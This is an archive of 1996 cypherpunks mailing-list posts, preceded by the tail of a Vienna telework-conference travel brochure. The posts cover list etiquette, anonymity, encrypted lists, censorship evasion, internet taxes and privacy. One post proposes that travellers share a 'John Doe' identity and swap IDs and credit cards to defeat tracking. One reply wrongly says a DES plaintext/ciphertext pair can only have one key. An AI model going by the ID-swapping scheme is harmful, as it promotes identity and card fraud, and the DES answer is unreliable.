craftsmanship for economy. You will be guided through the production area and
the adjacent showroom. The Museum of Applied Arts, recently renovated, houses
a large collection of furniture, glass and objects for daily use from baroque
times to the beginning of the 20th century. Particularly interesting are
cutlery, jewellery etc. by Kolo Moser, all types of chairs by the Thonet
Brothers and designs by Josef Hofmann.
Price per person, incl. bus tour, guide and entrance fees ATS 320,
Minimum of 25 people per bus

Imperial Vienna: Treasury and Imperial Burial Vault
Meeting place: Rathaus at 2PM, duration approx. 2
The treasury is the oldest part of the Hofburg, mentioned already in the 13th
century and contains a display of priceless treasures that bears witness to
the former imperial power: insignias and jewels over a thousand years old of
the Roman-German Empire and the treasury of the Order of the Golden Fleece.
Afterwards, visit of the Imperial Burial Vault, where more than 130 Habsburgs
were burried, among them 12 emperors and 16 empresses. The design of the
coffins shows the change in the comprehension of arts over three centuries.
Price per person, incl. guide and entrance fees ATS 250,
Minimum of 15 people per group

Tours are subject to change.

---------------------------------------------------------------

Hotel and Travel Arrangements

Austropa-Interconvention, Oesterreichisches Verkehrsburo AG, has been
entrusted by the organising committee to handle all hotel reservations and
asks all participants, to reserve rooms with the enclosed hotel reservation
form only. The exact indication of arrival and departure dates, as well as
the desired hotel category is necessary. Please make your selection of hotel
category according to the following list. Should the requested category not
be available anymore, a booking in the next higher category will be made.
All prices quoted are per night, per room and include daily breakfast,
service charges and all taxes.

1. Category A**** Deposit ATS 2.000, per room
Single room ATS    980, to ATS  1.600,
Double room ATS  1.450, to ATS  2.360,

2. Category B *** Deposit ATS 1.500, per room
Single room  ATS     650, to ATS     980,
Double room ATS     990, to ATS  1.380,

3. Pension - Category B*** Deposit ATS 1.000, per room
Single room ATS     650,
Double room ATS  1.100, to ATS  1.290,

All rooms with bath or shower and toilette.

Please book your hotel before September 30, 1996

Methods of payment for hotel deposits and optional tours
Please send a cheque or money order together with the hotel accommodation
booking form to Austropa Interconvention, P.O.Box 30, A-1043 Vienna, Austria,
or make a bank transfer FREE OF BANK CHARGES to the AUSTROPA account no.:
0035-14775/00 at the Creditanstalt-Bankverein, Vienna, bankcode 11.000. All
payments are to be made in Austrian Schillings (ATS). Please do not forget to
indicate the name of the participant and the purpose of payment. After the
receipt of your deposit we will send you a hotel voucher, indicating the name
and exact address of the hotel booked.
Kindly inform Austropa Interconvention immediately of any changes in the
dates of arrival or departure and in case of cancellation. For cancellations
up to one week prior to arrival, a handling fee of ATS 300, per booking will
be charged. Afterwards, no more refunds of hotel deposits will be possible.

---------------------------------------------------------------

All inclusive Flight Arrangements

Austropa Interconvention in cooperation with Austrian Airlines and other IATA
carriers offers the participants of the "TELEWORK '96 Congress" all inclusive
flight arrangements. These arrangements include the following services:
Economy class return ticket on regular flights, 20 kg (44 lbs) baggage
allowance, 5 nights accommodation in a double room with bath/shower/WC of
hotels in the 3*** category, buffet breakfast, service charges, taxes,
transfer from the airport to the hotel and vice versa. All airport taxes are
INCLUDED. For participants, travelling alone, please add the single room
supplement as listed below. Booking deadline: September 30, 1996.

Payment:
Please note, that your ticket can be issued only after receipt of full
prepayment. Tickets will be mailed to participants after September 30, 1996.

Cancellation policies:
In case of cancellation or changes before September 30, 1996, Austropa
Interconvention will charge a handling fee of ATS 1.000, per person. For
cancellations after September 30, 50% of the total cost of the flight
arrangement will be charged to the participant. Changes of flight dates are
not possible after September 30. All cancellations and changes have to be
made in writing.

Flight dates:
Arrival in Vienna: November 2, 1996
Departure from Vienna: November 7, 1996
If you wish to book different dates or destinations than indicated, please
contact Austropa Interconvention. All prices are in Austrian Schillings and
are based on ticket prices and exchange rates per January 1996. Prices are
subject to changes. Sunday rule applies.

Place of Dep *** Hotel
Rom 9.785,--
Paris 9.975,--
London 8.295,--
Madrid 10.745,--
Lissabon 11.080,--
Genf 9.540,--
Zurich 9.025,--
Kopenhagen 9.930,--
Amsterdam 9.960,--
Stockholm 10.480,--
Helsinki 12.285,--
Hamburg 11.925,--
Dusseldorf 11.523,--
Frankfurt 10.385,--
Stuttgart 10.015,--
Munchen 8.685,--
Berlin 10.530,--
Dresden 9.965,--
Leipzig 9.965,--
Bremen 12.970,--
Munster 12.645,--
Friedrichshafen 13.530,--

Single room supplement for 5 nights, Hotel ***   ATS 800,





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Travis Hassloch x231 <travis@evtech.com>
Date: Tue, 1 Oct 1996 07:57:25 +0800
To: perry@piermont.com
Subject: Re: The Nature of the Cypherpunks List
In-Reply-To: <199609241913.PAA19989@jekyll.piermont.com>
Message-ID: <199609302011.PAA15378@tahiti.evtech.com>
MIME-Version: 1.0
Content-Type: text/plain


In message <199609241913.PAA19989@jekyll.piermont.com> you write: 
> Timothy C. May writes:
> > While some folks would rather we talked only about "crypto," just how many
> > times can basic questions about Diffie-Hellman, or RSA, or elliptic curves
> > be discussed?
> 
> Sure, there is a limit to what can be said about cryptography and the
> direct politics of cryptography. *THAT IS THE POINT*. That is why I'm
> starting a new list -- so that I can abandon this waste heap to those
> that like frolicking in the mire.

here here.  400 messages in less than a week, with no digest, no moderated
equivalent and no explanation for the "-ratings" list?
who has time for that?  i'm interested in crypto but
i have a hard time believing any serious researcher could sift through all
the messages and still have time left to eat & breathe, much less code!

goodbye (again!) cypherpunks list!  i had hoped things had changed in
the last 2+ years but i guess not.  as far as i'm concerned if it
generates > 10 emails a day i'd have to justify reading it to my
employers, or cut back on my coding at home, neither of which is
likely to happen :)

i am interested in any alternatives, cypherpunks readers...
other mailing lists that are serious about crypto, security, etc.
wasn't there talk at one time of a list for coders?  can anyone
remind me of what happened to it or where it exists now?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. Allen Smith" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Tue, 1 Oct 1996 07:49:42 +0800
To: gregburk@netcom.com
Subject: Re: Not reputation again! (Was: The Nature of the Cypherpunks List)
Message-ID: <01IA3ETGL27Y8Y57AQ@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"gregburk@netcom.com" 25-SEP-1996 07:25:48.98

>You could contend that the Poster With Nothing Better To Do's reputation
>is balanced precariously at exactly 0. I would find that a big stretch,
>and as above, if that's 0, what's negative?

	A fully anonymous individual (not a pseudonym or otherwise
trackable individual) is inevitably going to have a reputation of 0.
It can't be negative; that would be saying that I could flame myself via
remailers and _increase_ my reputation if I did it properly. The person
can't exactly build up a reputation of above 0, since that would require
multiple good postings and/or some form of escrow.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iang@cs.berkeley.edu (Ian Goldberg)
Date: Tue, 1 Oct 1996 10:19:42 +0800
To: cypherpunks@toad.com
Subject: Re: POLL RESULTS
In-Reply-To: <Pine.SUN.3.91.960930075945.10636B-100000@crl9.crl.com>
Message-ID: <52phjn$fjs@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <Pine.SUN.3.91.960930075945.10636B-100000@crl9.crl.com>,
Sandy Sandfort  <sandfort@crl.com> wrote:
>Last week I offered an informal poll as to the reputational 
>effect of "John Anonymous MacDonald" and other apparent nyms.

Just remember that "John Anonymous MacDonald" is the name that appears
on _every_ item remailed from the jam remailer, <remailer@cypherpunks.ca>;
it's not a nym belonging to a single person.

   - Ian <remailer-admin@cypherpunks.ca>

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMlBJrEZRiTErSPb1AQEvrQP/TU194LbxJa0Lzz3HBd0+EHewDMc/4MS1
OJMzliOF8nFAWK6pLFy7CT4m0pLmDMvAFIeuv0FnD4h86yCUGRLfuaUyUOKuOmLv
DNrHJ8z2OIs3oogsupo+9ySeRn61E6SxrdeoIM7bNVZBBzNMdpXWYUf4FyHLMhay
yOTC/pjKhpg=
=w/eA
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. Allen Smith" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Tue, 1 Oct 1996 08:02:25 +0800
To: scs@lokkur.dexter.mi.us
Subject: Re: Encrypted lists and ease of use
Message-ID: <01IA3FDVFUWO8Y57AQ@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	Where was the information on PGPdomo? That would seem appropriate
for the input end, at least.
	-Allen

From:	IN%"scs@lokkur.dexter.mi.us" 26-SEP-1996 17:26:10.69
Subj:	Encrypted lists and ease of use

I'm considering sending someone off to work on a project, but wanted to
sanity-check the idea and see if someone already has something similar.

Recently I've been involved in a number of small (30 people or less)
mailing lists which occasionally use PGP for encrypted mail.

The hassle comes when one is encrypting a message to the list.  With
people coming and going, remembering who is on what list is impossible.
We're always having to go back and re-send to someone who was left off
of the encryption list.

What I propose to do is have a second list, list-encrypted@host, for
every list@host.  Any mail sent to the list simply goes out in plaintext.
List-encrypted is encrypted for everyone on list, then sent to the list
with appropriate additional headers.

To secure the mail as it travels from the sender to list-encrypted, we
want to establish a public key for list-encrypted.  All mail to the list
*must* travel with the public key or be rejected.  When mail arrives at
list-encrypted, a deamon will process it.  The daemon knows the secret
key for -encrypted, and has a list of who is on what list.  The daemon
strips the -encrypted address, encrypts the message for all on the list.
If there are other people on the To: or Cc: fields, the deamon will
encrypt for them as well.  If any of this fails, the message is sent to
as many as possible and notification failure goes back to the original
sender indicating who the failures were.  The daemon then forwards it
to the list real list.  It preserves the From: field, but changs `To:
list-encrypted' into simply `To: list.'

Comments?  Generally useful?  Beta volunteers?  :-)
-- 
  "Yea, the heavens shall open and the NP-complete solution given forth.
ATT executives shall give birth to two-headed operating systems, and 
copyrights shall be expunged.  The voice of the GNU shall be heard, but
the faithless will be without transceivers."   -- me




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Tue, 1 Oct 1996 08:00:44 +0800
To: Kim Yoonjeong <yjkim@ssrnet.snu.ac.kr>
Subject: Re: the key of DES
In-Reply-To: <199609301017.UAA04791@ssrnet.snu.ac.kr>
Message-ID: <Pine.LNX.3.94.960930155114.762A-100000@anx0918.slip.appstate.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 30 Sep 1996, Kim Yoonjeong wrote:

> Hello, all !
> With given a unknown DES system with 64 bits plaintext p, ciphertext c,
> can there be MORE THAN ONE keys ? 

No.

> If so, How is the probability (big or small)? 
> 
> 	Sincerely, 
> 	 - Yoonejong 
> 
> =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
>  Yoonjeong Kim 				Email: yjkim@ssrnet.snu.ac.kr
>  Department of Computer Engineering	Phone: +82-2-875-7726 (office)
>  Seoul National University		       +82-2-872-9801 (home)	
>  Seoul 151-742 Korea			Fax:   +82-2-875-7726
> =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
> 
> 
> 


 --Deviant
"If you eliminate the impossible, whatever remains, however improbable,
must be true." -- Spock






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. Allen Smith" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Tue, 1 Oct 1996 07:47:33 +0800
To: cypherpunks@toad.com
Subject: Algeria & Censorship
Message-ID: <01IA3G4IAXWW8Y57AQ@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	While I agree with the Algerian military in preventing an Islamic
Fundamentalist takeover (it's one of my examples of situations in which
democracy goes wrong), I definitely don't support many of their other
actions. Lesser of two evils...
	-Allen

>     _________________________________________________________________
>   PC Travel
>     _________________________________________________________________
>                SUSPENDED ALGERIAN DAILY OFFERED INTERNET PAGE
>   __________________________________________________________________________
>      Copyright &copy 1996 Nando.net
>      Copyright &copy 1996 Reuter Information Service

>   PARIS (Sep 30, 1996 1:24 p.m. EDT) - A press freedom watchdog on
>   Monday offered the suspended Algerian daily La Tribune a page on its
>   Internet site to give it an airing during the six-month ban.
   
>   "Thanks to this initiative, these journalists, banned from writing by
>   the Algerian authorities, will be able to practice their trade again,"
>   the Paris-based Reporters without Borders (RsF) said.
   
>   An Algiers court suspended La Tribune for six months on September 3
>   over a cartoon mocking the Algerian flag.
   
[...]

>   Fifty-seven journalists have been murdered by suspected rebels. RsF
>   said authorities had suspended or seized newspapers on 55 occasions
>   and 23 journalists had been held for more than 48 hours since the
>   conflict broke out over the 1992 cancellation of a general election
>   fundamentalists were poised to win.
   
>    Copyright &copy 1996 Nando.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. Allen Smith" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Tue, 1 Oct 1996 08:39:13 +0800
To: cypherpunks@toad.com
Subject: Inflation-index bonds and private e-currency
Message-ID: <01IA3GAFNCWK8Y57AQ@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	One of the attractions of privately-produced currencies is as a
hedge against inflation; this development may be a competitor to this
idea. On the other hand, this setup does have an unavailability in _time_
of the money (more so than other, equal-security bonds of the same duration),
which may offset its greater spendability.
	-Allen

>    BARRON'S Online - Market Surveillance for the Financial Elite
>     _________________________________________________________________
>   Barron's
>     _________________________________________________________________
>        CLINTON UNVEILING NEW GOVERNMENT BOND WITH INFLATION PROTECTION
>   __________________________________________________________________________
>      Copyright &copy 1996 Nando.net
>      Copyright &copy 1996 The Associated Press
      
>   WASHINGTON (Sep 25, 1996 11:12 a.m. EDT) -- President Clinton, in his
>   latest election-year appeal to the middle class, is unveiling details
>   of a new type of government bond that will offer investors protection
>   against inflation.
   
[...]

>   As the program was explained, the securities will protect the
>   principal against inflation, as measured by the consumer price index.
>   As an example, the official said, if inflation increases 3 percent in
>   a given year, a $1,000 bond would be adjusted upward to $1,030 at the
>   end of that year.
   
>   By offering this protection, interest rates on the bonds will be lower
>   than on regular 10-year notes that do not provide inflation
>   protection.
   
[...]

>   The notion of tying government securities to inflation has not been
>   tried in the United States, but other countries have been offering
>   such investments for some time.
   
>   Such bonds have been available in Britain since 1981 and are also
>   offered in Canada, New Zealand, Australia, Israel and Sweden.
   
>    Copyright &copy 1996 Nando.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. Allen Smith" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Tue, 1 Oct 1996 08:39:38 +0800
To: cypherpunks@toad.com
Subject: [NEWS] More internet-tax proposals
Message-ID: <01IA3GIEKEYW8Y57AQ@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


>     _________________________________________________________________
>   Centura
>     _________________________________________________________________
>     INTERNET BEWARE: GOVERNMENTS ARE SMELLING A RICH NEW SOURCE OF TAXES
>   __________________________________________________________________________
>      Copyright &copy 1996 Nando.net
>      Copyright &copy 1996 The Boston Globe
      
>   (Sep 25, 1996 8:06 p.m. EDT) If taxes are the price we pay for
>   civilization, the Internet is about to become a lot more civilized.
>   State and local governments are coming to see on-line computer
>   networks as a rich, new revenue source, and they want to cash in.
   
>   An official of the Massachusetts Department of Revenue said this month
>   on-line service providers that do business in the state should be
>   paying a 5 percent sales tax. Those who haven't been paying could face
>   audits, penalties and demands for back taxes.
   
>   The state of Tennessee has demanded on-line services doing business
>   there turn over their tax records and a count of how many customers
>   they have in the state. Cities in Texas and Colorado are considering
>   special on-line taxes. And a recent effort to slap a 6 percent tax on
>   Internet users in Tacoma, Wash., aroused so much public outrage that
>   city officials were forced to back off.
   
>   Many Internet experts agree that Internet taxes are inevitable. After
>   all, connecting computers to the Internet is now a $2 billion
>   business, and people use these networks to buy and sell millions of
>   dollars in goods and services.
   
[...]

>   But some also fear the chaos that could result as 50 state governments
>   and thousands of cities and counties each make their own rules about
>   taxing computer networks and the transactions that occur on them.
   
>   The issue may be given new prominence, thanks to a surprising decision
>   by a major Internet service provider. In late August, Netcom On-Line
>   Communication Services Inc. began notifying its Massachusetts
>   customers the company would start adding the state's 5 percent sales
>   tax to its bills. Netcom typically charges $19.95 a month for a
>   personal Internet account, so the tax would amount to $1. Similar
>   notices were sent to Netcom customers in several other states,
>   including Illinois and Pennsylvania.
   
>   Did the taxing authorities in these states demand their money? Guess
>   again. Netcom has decided to begin paying the taxes voluntarily.
>   Thomas Weatherford, Netcom's chief financial officer, said its
>   accounting firm, Ernst & Young, warned them early this year that
>   Netcom might be liable for the taxes.
   
[...]
   
>   So Netcom contacted state tax officials for clarification. Netcom's
>   500,000 customers are scattered throughout the United States, but the
>   company is focusing on tax laws in Massachusetts and 14 other states
>   where most of its customers dwell. Weatherford said he still had
>   received no official word from Massachusetts, but Netcom attorneys had
>   concluded the company is subject to the state's telecommunication
>   sales tax. To play it safe, it will begin collecting the tax this
>   month.

	Remind me not to sign up with Netcom.
   
>   It's probably a smart move. At the Massachusetts Department of
>   Revenue, acting general counsel William Hazel told the Globe that
>   Netcom and every other on-line service provider should be paying the
>   sales tax.
   
>   "To the extent that folks are being charged for the ability to
>   telecommunicate through the Internet... that's taxable," he said.
   
>   This situation could change. The state has set up a legislative
>   commission to review its telecommunications tax policy, with a final
>   report due next year. But for now, Hazel said, Massachusetts wants its
>   money, including back taxes from up to seven years ago. Hazel said
>   some Internet access providers are paying the tax already.
   
>   But plenty of others are not. For example, Kristopher Hill, president
>   of NetWorx Internet Services Inc. in Newburyport, said he believed his
>   firm didn't have to pay sales tax in any of the dozen states in which
>   it operates. He wasn't thrilled to hear that he may be wrong. "If we
>   have to start dealing with Chicago tax law, that'll be a major pain in
>   my butt," he said. Chicago imposes a tax on telecommunications
>   services over and above the Illinois state tax.
   
>   Hill is even more annoyed by the prospect of being ordered to pay
>   years of back sales taxes in Massachusetts. He said state officials
>   never told Internet service providers they were liable for the money,
>   and to try to collect it now would be unfair. "We would sooner leave
>   the commonwealth than be subjected to seemingly arbitrary and
>   ill-defined taxes," Hill said.
   
[...]

>   Netcom's Weatherford opposes taxes on Internet services but says if
>   his company pays voluntarily, tax officials should demand payment from
>   Netcom's competitors. That could mean trouble for America's 3,700
>   Internet service providers, many of which are shoestring operations
>   that will have to set up tax collection procedures.

	Translation: Netcom is attempting to use regulations to shut
down its competitors.
   
>   The fuss over Internet service taxes is just the beginning. Another
>   sticky controversy awaits: How do you tax sales of goods and services
>   over the Internet?
   
[...]

>   And then there's the question of which government is entitled to
>   collect the tax. Say you log on to Ohio-based CompuServe, where you
>   buy a fruit basket from a firm in California and have it sent to your
>   mother in Chicago. Which state gets to collect tax on the transaction?
>   The experts say right now, the answer is unclear.

	If they think that's "unclear", wait until they start dealing with
multinational transactions....
   
>   But tax-hungry governments are hard at work trying to figure it all
>   out. According to KPMG Peat Marwick, sales of goods and services over
>   the Internet will reach $125 billion by the year 2000. One way or
>   another, governments intend to get their share.

	Note the typical biased phrasing.
   
[...]

>    Copyright &copy 1996 Nando.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. Allen Smith" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Tue, 1 Oct 1996 08:22:56 +0800
To: cypherpunks@toad.com
Subject: Lucent & Internet Phone
Message-ID: <01IA3GPHPQ9O8Y57AQ@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


>     _________________________________________________________________
>   PC Travel
>     _________________________________________________________________
>                LUCENT VOWS TO MAKE INTERNET PHONES EASY TO USE
>   __________________________________________________________________________
>      Copyright &copy 1996 Nando.net
>      Copyright &copy 1996 Reuter Information Service
      
>   NEW YORK (Sep 17, 1996 7:53 p.m. EDT) - Lucent Technologies Inc.,
>   vowing to make voice and video communication over the Internet as
>   easy-to-use and accessible as the telephone, unveiled Tuesday a new
>   business venture and several products designed to bring Internet
>   communication into the mainstream.
   
[...]

>   The venture is charged with commercializing several ground-breaking
>   Internet software commpression technologies developed at Lucent's Bell
>   Laboratories research unit. Such technology shrinks the capacity
>   required to transmit information over communications networks.
   
>   Internet-based communications typically requires access to a personal
>   computer, but Lucent envisions using the telephone or other consumer
>   electronics device for the same purpose.
   
>   Murray Hill, N.J.-based Lucent said its new Elemedia Internet business
>   is now offering software that allows callers to hold
>   "telephone-quality" conversations over the Internet.

	Has anyone taken a look at this software with a view to an
encryption patch?
   
>   Lucent said its strategy was to capitalize on software component
>   technology developed by Bell Labs by licensing it to other Internet
>   phone makers and established telephone carriers for use in their own
>   products. Lucent does not intend to sell its products directly to the
>   public.

	As I recall, Jeff Weinstein mentioned that he was looking into
encryption for the Netscape Internet Phone. I would be curious if Netscape
is considering integrating the Lucent software.
   
>   It said its products would be compatible with all major computer
>   operating systems and Internet browsers software.

[...]
   
>   Lucent will introduce a means for callers using standard telephones to
>   place calls via the Internet to callers at conventional phones or to
>   newer PC-based phones.
   
>   "We believe voice communications between Internet PCs is much more
>   valuable if those voice conversations can happen with people who have
>   telephones," Pavarini said.
   
>   Lucent officials said these new business-oriented products will become
>   commercially available beginning in the first quarter of 1997 in the
>   United States and be rolled out to selected overseas markets through
>   the second quarter of 1997.
   
[...]

>    Copyright &copy 1996 Nando.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Tue, 1 Oct 1996 11:56:56 +0800
To: cypherpunks@toad.com
Subject: The John Doe rebellion
Message-ID: <v02130500ae75a1ef6846@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


I have some direct insight as to how airlines interpret the new travel
provisions and what they are reasonably able to accomplish in improving
safety via identity and luggage checks.

I was wondering if with gov't trying to compile dossiers on travellers it
might be possible for a large enough percentage of frequent air travellers
to assume the same identity (e.g., John or Jane Doe).  If so, a service
could be established to book airline reservations under a single credit
card for Does so as to confound automated tracking systems.

Eventually, Does could arrange to exchange IDs (if their ages and
descriptions matched) and even credit cards (again assuming equivalence) to
really monkey wrench things.

-- Steve






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. Allen Smith" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Tue, 1 Oct 1996 08:30:23 +0800
To: cypherpunks@toad.com
Subject: Malaysia ranting about the Internet
Message-ID: <01IA3HHL8XEO8Y57AQ@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain



	Rack up another country likely to start censoring the Net (or
trying to, at least). What degree of Internet connectivity does Malaysia
have, anyway?

>     _________________________________________________________________
>   Centura
>     _________________________________________________________________
>                MALAYSIA SAYS WEST SPREADING SMUT AND VIOLENCE
>   __________________________________________________________________________
>      Copyright &copy 1996 Nando.net
>      Copyright &copy 1996 Reuter Information Service
      
>   UNITED NATIONS (Sep 28, 1996 02:12 a.m. EDT) - Malaysia's prime
>   minister accused the West Friday of spreading smut and violence,
>   particularly on the Internet.

	And what, pray tell, is wrong with this?
   
>   In his speech to the U.N. General Assembly, Mahathir bin Mohamad said
>   that although the information age facilitated worldwide knowledge, it
>   also demeaned moral values.
   
>   "Smut and violence gratuitously distributed by criminals in the North
>   is no less polluting than carbon dioxide emissions nor less dangerous
>   than drug trafficking."

	All three of them things that probably shouldn't be limited,
noticeably, and things that are classically used to discourage human
freedom & progress.

>   In a reference to the United States he said if one great power could
>   apply its laws to citizens of another country for drug trafficking
>   "why cannot countries with different moral codes extradite the
>   traffickers of pornography for legal action?"
   
>   "Before the whole world sinks deeper into moral decay, the
>   international community should act. Abuse of the ubiquitous Internet
>   system must be stopped," he said.
   
>   Politically, he said the monopoly of the West's electronic media
>   should be broken on so-called world news networks.
   
>   "Not only are distorted pictures of our countries being broadcast but
>   our own capacity to understand what is happening is being undermined,"
>   he said.

	Translation: people are finding out true information that local
governments don't like - such as what goes wrong.
   
>   "In the past, Western missionaries spread the gospel. Today the media
>   has taken over and all our cherished values and diverse cultures are
>   being destroyed," he said.

	Translation: our culture that promotes censorship and other civil
liberties violations is being destroyed.
   
[...]

>   The prime minister also lashed out at U.N. forums where nations
>   lamented poverty, debt, human rights abuse, conflicts and war without
>   doing much about them.
   
>   "It is boring almost. And yet nothing much has been done which could
>   bring about amelioration of this sad state of affairs," he said.
   
	Translation: Give us money.

>    Copyright &copy 1996 Nando.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Tue, 1 Oct 1996 04:57:45 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: Tools for Rendering Censorship Firewalls Ineffective
In-Reply-To: <199609300305.UAA03732@netcomsv.netcom.com>
Message-ID: <324FE61D.15FB7483@systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


Bill Stewart wrote:
> 
> The obvious techniques I can see include
> 1) Filter on IP address (e.g. German attack on XS4ALL)
> 2) Filter on DNS Name
> 3) Filter on Patterns in URL
> 4) Filter on Patterns in PUT/GET Requests
> 5) Filter on Patterns in Response.
> 6) Traffic Analysis on reading patterns
> 
> 1) It's easy to evade the crude version of this attack - use rolling IP
> addresses, and use DNS to publish the new ones.  For the German model,
> where the government has to tell the ISPs who to block, this wins.
> They can counter by blocking your whole IP network, not just a single
> machine, which you can counter by hopping IP networks as well as hosts,
> though that's more trouble (and blocking routes is probably easier
> than blocking hosts, since you do it at the routers, and harder to
> get people to turn back on.)  They can also enforce boycotts on the ISP,
> as they did with XS4ALL - blocking most of the traffic to a site
> can affect its other traffic enough to be economically annoying.

I would guess that most sites censoring http by IP would be doing so by
only censoring the http port.  If the http servers were to be run on
other ports too (perhaps well known ports like DNS), then this would
make life a little harder for the bad guys.  This would be especially
true if their routers were configured to allow ALL DNS requests through
(for example).  This may be a problem for some browsers (I know it's a
problem with netscape), as I mentioned a few weeks ago.


> What other kinds of attacks are there?  What other defenses?
> What kinds of holes are there in these defenses?

I have some encrypted HTTP relay software if anyone is interested in
setting up a server.

Gary
--
"Of course the US Constitution isn't perfect; but it's a lot better
than what we have now."  -- Unknown.

pub  1024/C001D00D 1996/01/22  Gary Howland <gary@systemics.com>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc Weber <blancw@microsoft.com>
Date: Tue, 1 Oct 1996 12:08:37 +0800
To: "'cypherpunks@toad.com>
Subject: RE: POLL RESULTS
Message-ID: <c=US%a=_%p=msft%l=RED-81-MSG-961001002958Z-1422@mail.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


From:	Timothy C. May 

Interesting that Detweiler returned with a _Russian_ nym.
........................................................................


I don't think LD is Russian.  I think he's actually an Asparagus.
(bwahhahahhahahhah)

    ..
Blanc





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lee Gibbon <leegib@microsoft.com>
Date: Tue, 1 Oct 1996 12:57:14 +0800
To: "'cypherpunks@toad.com>
Subject: FW: [INFO] Internet Privacy:  Reflections on Europe in the Digital Age
Message-ID: <c=US%a=_%p=msft%l=RED-65-MSG-961001003528Z-3272@mail3.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain




>-----Original Message-----
>----------
>
>this is probably obvious to many of you, but it is still interesting and
>sobering to see the issue spelled out all in one place....
>
>>----------
>>
>>Forwarded-by: Phil Agre <pagre@weber.ucsd.edu>
>>
>>Date: Fri, 20 Sep 1996 19:16:19 +0200
>>From: steve@isys.hu (Steven Carlson)
>>To: hungary-online-announce@hungary.yak.net
>>Subject: (HOL-A) It's a Brave Old World
>>
>>  ------------------------------
>>  Brave Old World:
>>  Reflections on Europe in the Digital Age
>>  by Steven Carlson; 20 Sep 1996
>>  ------------------------------
>>
>>  ** So Much Fuss About A Bottle Of Ketchup
>>
>>  Hungarian police recently sent a fax around to the local Internet
>>  service providers (ISPs) asking them to provide lists of their users
>>  in Esztergom, a small town outside of Budapest. It seems somebody
>>  had planted a bomb in a bottle of ketchup. Since everyone knows you
>>  can download bomb-making instructions from the Internet, the police
>>  figured they should investigate the local users. No, I'm not making
>>  this up.
>>
>>  What's more, nearly every local ISP gave the police this information.
>>  Fortunately my company has no users in Esztergom and so that's what we
>>  told the police. We got off lucky. Believe me, as much as might want
>>  to make a stand for privacy of information my company is NOT eager to
>>  do battle with the Hungarian authorities.
>>
>>  But that's what it might take. Because if the Hungarian police really
>>  understood the Internet they could have asked for even more. For
>>  example, it would only take a few keystrokes to forward a users' mail
>>  to the authorities. The police might also have asked for old email,
>>  since many ISPs back this up routinely.
>>
>>  But that's not all. Some ISPs run caching servers, machines that store
>>  frequently-viewed webpages so that users access them locally rather
>>  than across the net. An ISP's caching server could give the police a
>>  profile of what web pages the users have been browsing.
>>
>>  I'm not trying to scare anyone. My point is that sharing information
>>  on the Internet is a two-way street. Computers keep extensive records.
>>  Using the Internet often means you leave a trail behind you. This is
>>  part of life in the digital age.
>>
>>  This "electronic trail" is not unique to the Internet. Every time you
>>  use a credit card you create a record in several computers. Other
>>  computers may be storing information about you such as your medical
>>  history, driving record, tax filings and so on. The more we rely on
>>  computers to manage our affairs, the more information that may be "out
>>  there." This means citizens in the digital age should know their
>>  rights.
>>
>>  Many governments already have laws to protect private information. For
>>  example, the US has many laws restricting access to sensitive
>>  information such as medical and credit records. You might be surprised
>>  to know Hungary passed a law in 1991 to prevent misuse of information
>>  associated with the national identity card.
>>
>>  Yet the growth of new technologies is outpacing legislation. For
>>  example, Holland and other countries are experimenting with "smart
>>  road" systems that can identify the licence number of a moving car for
>>  purposes of toll collection. Cellular phones and satellite navigation
>>  systems can report the locations of their users. It's not difficult to
>>  imagine how these and other technologies could be abused.
>>
>>  Of course, now you know that even your local Internet provider has
>>  access to some rather sensitive information about you. This leads me
>>  to ask: what sort of service is your Internet provider actually
>>  offering?
>>
>>  When it comes down to it, your ISP is like your doctor, your lawyer,
>>  your accountant or your psychiatrist. Each of these professionals
